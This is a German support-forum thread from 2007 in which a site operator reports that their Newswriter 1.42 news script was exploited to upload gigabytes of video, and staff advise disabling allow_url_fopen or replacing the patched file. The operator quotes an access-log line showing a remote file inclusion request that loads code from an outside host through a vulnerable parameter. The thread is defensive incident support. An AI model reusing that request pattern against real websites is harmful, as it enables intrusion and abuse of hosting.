Willkommen Gast. Bitte einloggen oder registrieren.
Haben Sie Ihre Aktivierungs E-Mail übersehen?

Einloggen mit Benutzername, Passwort und Sitzungslänge

 
Erweiterte Suche

7023 Beiträge in 1155 Themen- von 599 Mitglieder - Neuestes Mitglied: Erika

12-10-2008, 07:21:37
faqboard.info - SupportforumScriptfragenNewswriter News Management ScriptHackerangriff auf Newswriter
Seiten: [1]   Nach unten
Drucken
Autor Thema: Hackerangriff auf Newswriter  (Gelesen 659 mal)
jdgf
Newbie
*
Offline Offline

Beiträge: 1


Profil anzeigen
« am: 24-08-2007, 14:56:44 »

Hallo,

auf unserer Webseite www.kolping-hohenfels.de arbeiten wir schon seit langem zufrieden mit Newswriter 1.42 (31.10.2005). Gestern wurde unsere Seite gehackt, indem 8,4 GB Videodateien hochgeladen wurden und unser Limit gesprengt wurde.
Die Einträge im Logfile verweisen auf das Newswriter-Script. Im Forum habe ich den Hinweis gefunden, das die Einstellung allow_url_fopen = off Zugriffe von außen verhindern würde. Da wir mehrere Scripte auf der Homepage laufen haben, wäre es besser, wenn dies nur beschränkt auf den Newswriter festgelegt ist. Könnte ich dies mit einer .htaccess-Datei im Newswriterverzeichnis lösen? nw14 ist bei uns der Newswriterordner.

Hier der Auszug aus der Logfile:
Code:
87.17.201.123 - - [23/Aug/2007:15:46:45 +0200] "GET /kolping/nw14/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=
http://www.folgoreclan.com/rmod2.txt? HTTP/1.1" 200 66777 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.6)
Gecko/20070725 Firefox/2.0.0.6"

Vielen Dank für Eure Hilfe und
schöne Grüße aus der Oberpfalz
Dietmar
Gespeichert
Support Team
Jr. Member
**
Offline Offline

Beiträge: 97



Profil anzeigen WWW
« Antwort #1 am: 24-08-2007, 20:01:03 »

Hi,

eventuell kannst du den url_fopen Aufruf per htaccess einschränken, indem du die Direktive damit überschreibst.
Ich würde aber lieber die editfunc.inc.php an deiner Stelle ersetzen mit der im aktuellen ZIP File. Da ist der Bug behoben.
Gespeichert

Mit freundlichen Grüßen
Ihr Baumedia Support Team
Seiten: [1]   Nach oben
Drucken
Gehe zu: